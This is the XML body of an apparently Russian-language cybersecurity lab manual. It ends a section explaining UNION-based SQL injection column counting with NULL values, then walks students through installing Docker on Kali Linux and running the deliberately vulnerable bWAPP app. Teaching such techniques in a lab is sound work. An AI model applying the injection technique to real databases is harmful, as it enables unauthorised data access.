    <w:p w14:paraId="33128292" w14:textId="1D95319C" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">Если количество </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> не совпадает с количеством столбцов, база данных возвращает ошибку, например</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> все </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">запросы, объединенные оператором </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>INTERSECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>EXCEPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>, должны иметь одинаковое количество выражений в целевых списках.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9CE125" w14:textId="7515E568" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">Мы используем </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> в качестве возвращаемых значений, так как этот тип совместим с большинством типов данных, что увеличивает вероятность успешной инъекции при правильном количестве столбцов. Как и в случае с </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>, реакция приложения может варьироваться — от отображения ошибки до появления дополнительных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EA4D7D" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00CB262C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209B6DD4" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRPr="00E14271" w:rsidRDefault="00CB262C" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756E6862" w14:textId="77777777" w:rsidR="00036090" w:rsidRPr="00E14271" w:rsidRDefault="00036090" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DF74C1" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_1t3h5sf"/>
      <w:bookmarkStart w:id="18" w:name="_Toc182315627"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="0042218F">
        <w:t>ПРАКТИЧЕСКАЯ ЧАСТЬ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="528F0B4B" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="54B12DC3" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Предполагается, что у студентов установлен образ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>на виртуальной машине.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3572CC" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="1981D799" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc182315628"/>
      <w:r w:rsidRPr="0042218F">
        <w:lastRenderedPageBreak/>
        <w:t>1 Установка Docker на Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="2538DA1B" w14:textId="09955F97" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61846410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Docker — это платформа с открытым исходным кодом, предназначенная для разработки, развертывания и запуска приложений с использованием контейнеризации. Контейнеры Docker позволяют упаковывать приложение вместе с его зависимостями в единый переносимый образ, который можно запускать на любой системе, где установлен Docker. Это помогает устранить проблемы совместимости между различными средами разработки и эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF9407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Основные понятия Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE9EB2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Контейнеры - это изолированные среды, в которых работает приложение со всеми необходимыми библиотеками, зависимостями и конфигурациями. Контейнеры легко запускать, останавливать и перемещать между разными системами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007AD774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Образы (Images) - это шаблоны, из которых создаются контейнеры. Образы содержат все необходимое для работы приложения. Обычно образы создаются на основе Dockerfile (описание сборки образа).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A826E1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Dockerfile - текстовый файл, содержащий инструкции для создания образа. Он описывает шаги установки программ, конфигурации и настройки системы для запуска приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E83FE2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Docker Hub - это облачный реестр, где пользователи могут загружать, искать и скачивать образы Docker, созданные сообществом или официальными поставщиками.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7A4A4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Преимущества Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA3F282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Портативность: контейнеры можно запускать на любом сервере или устройстве с установленным Docker, независимо от окружения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B3148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Изоляция: контейнеры изолированы друг от друга, что позволяет минимизировать влияние одного приложения на другое.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE58A5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lastRenderedPageBreak/>
        <w:t>Быстрая разработка и развертывание: использование контейнеров упрощает перенос приложений между стадиями разработки и эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B8257" w14:textId="77777777" w:rsidR="0042218F" w:rsidRPr="0042218F" w:rsidRDefault="0042218F" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Эффективность ресурсов: контейнеры потребляют меньше ресурсов по сравнению с традиционными виртуальными машинами, так как они используют общее ядро ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A419A0" w14:textId="7011BA8D" w:rsidR="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:r w:rsidRPr="0042218F">
        <w:t>Основные команды Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732EA2CA" w14:textId="15090AB5" w:rsidR="0042218F" w:rsidRPr="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Запуск </w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t>нового контейнера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977D6AF" w14:textId="0972BF07" w:rsidR="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>docker run</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12172F89" w14:textId="000A6CB8" w:rsidR="0042218F" w:rsidRPr="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Отображение </w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t>работающих контейнеров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2573BCF6" w14:textId="43A02EE8" w:rsidR="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>docker ps</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733456D1" w14:textId="2AF97595" w:rsidR="0042218F" w:rsidRPr="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание </w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t>образа из Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424E47C" w14:textId="3BF6F504" w:rsidR="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>docker build</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2269BB" w14:textId="5C280A3C" w:rsidR="0042218F" w:rsidRPr="0042218F" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Загрузка </w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t>образа из Docker Hub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E4EF2" w14:textId="582F2C44" w:rsidR="0042218F" w:rsidRPr="00AB6179" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker pull</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2026C" w14:textId="10A52DFE" w:rsidR="00F337B0" w:rsidRPr="00AB6179" w:rsidRDefault="00F337B0" w:rsidP="00F337B0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Загрузка</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t>образа</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker Hub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B079B51" w14:textId="2BE2352D" w:rsidR="0042218F" w:rsidRPr="00AB6179" w:rsidRDefault="0042218F" w:rsidP="00F337B0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker push</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280C7F9" w14:textId="0DDE4094" w:rsidR="0042218F" w:rsidRPr="0042218F" w:rsidRDefault="0042218F" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Docker широко используется для создания современных приложений, микросервисов, CI/CD процессов, тестирования и разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11140944" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r w:rsidRPr="0042218F">
        <w:t>При установке Docker на Kali Linux необходимо учитывать, что в системе уже существует пакет с именем «docker». Поэтому для установки контейнерной версии Docker используется другой пакет под названием docker.io. Если установить стандартный пакет «docker», это не приведет к установке контейнерной версии Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B425CF" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r>
        <w:t>Мы будем устанавливать пакет docker.io. Все команды, связанные с Docker, остаются прежними, поэтому для работы в командной строке нужно использовать команду docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B4134" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r>
        <w:t>Процесс установки выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA13AEA" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Обновление списка пакетов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DE061" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:lastRenderedPageBreak/>
        <w:t>kali@kali:~$ sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7593A5" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Установка Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE19CC" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali@kali:~$ sudo apt install -y docker.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120A6CA" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Активация и автоматический запуск службы Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAB5AA4" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali@kali:~$ sudo systemctl enable docker --now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C11574" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Проверка установки и работы Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60CEBE" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kali@kali:~$ docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8336E" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4109C5B9" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В конце должно высветиться сообщение (рис. 1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF31DFA" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4BFE20" wp14:editId="4A60DAFB">
                <wp:extent cx="5940425" cy="4886691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080200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4886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84.78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14:paraId="3FD1DC82" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 1.1. Проверка на наличии утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71053526" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD4EF68" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc182315629"/>
      <w:r w:rsidRPr="0042218F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Установка и запуск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="56F16BAE" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r>
        <w:t>bWAPP (Buggy Web Application) — это бесплатное и открытое программное обеспечение, представляющее собой намеренно уязвимое веб-приложение. Оно создано для обучения и практики в области безопасности и служит полезным инструментом для специалистов по кибербезопасности, разработчиков и студентов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BCD8A4" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r>
        <w:t>bWAPP позволяет исследовать и предотвращать различные веб-уязвимости, помогая пользователям осваивать навыки, необходимые для успешного проведения тестов на проникновение и проектов в сфере этичного хакинга.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFCAAC" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9ED9B6" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Официальный сайт приложения с уязвимостями можно найти по адресу </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="http://www.itsecgames.com/index.htm." w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="afd"/>
            <w:lang w:val="ru-RU"/>
          </w:rPr>
          <w:t>http://www.itsecgames.com/index.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Но для работы достаточно установить и запустить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6179">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>контейнер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1301EB" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="303D764E" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Установка происходит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F05166" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Скачать образ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F7F55" w14:textId="5E4F3523" w:rsidR="00C93297" w:rsidRPr="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="00D626E1" w:rsidRPr="00CB262C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker pull raesene/bwapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674D271" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Запустить контейнер:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA2ED6" w14:textId="30E53F9C" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00CB262C" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="00D626E1" w:rsidRPr="0042218F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker run -d -p 80:80 raesene/bwapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A3B643" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="0042218F" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
